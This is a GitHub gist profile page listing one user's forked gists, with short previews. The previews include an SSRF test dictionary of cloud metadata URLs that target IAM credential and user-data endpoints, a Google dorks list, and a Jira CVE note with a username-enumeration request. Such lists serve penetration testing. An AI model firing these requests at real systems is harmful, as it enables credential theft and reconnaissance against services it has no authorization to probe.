Jagan Raj C J jaganrajcj
jaganrajcj
/ cloud_metadata.txt
Created
August 24, 2021 05:51
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
jaganrajcj
/ notify-slack.sh
Created
February 3, 2021 07:26
— forked from arjones/notify-slack.sh
Notify Slack - Send notifications to a Slack Channel - http://arjon.es/2016/09/15/be-notified-on-slack-when-a-long-process-finishes/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Notify Slack - Send notifications to a Slack Channel | |
| # Copyright (C) 2016 Gustavo Arjones (@arjones) | |
| # | |
| # This program is free software; you can redistribute it and/or | |
| # modify it under the terms of the GNU General Public License | |
| # as published by the Free Software Foundation; either version 2 | |
| # of the License, or (at your option) any later version. | |
| # | |
| # Full blog post here: http://arjon.es/2016/09/15/be-notified-on-slack-when-a-long-process-finishes/ | |
| # |
jaganrajcj
/ google-dorks
Created
January 22, 2021 03:55
— forked from stevenswafford/google-dorks
Listing of a number of useful Google dorks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
jaganrajcj
/ Jira bug-exploit
Created
January 10, 2021 15:30
— forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |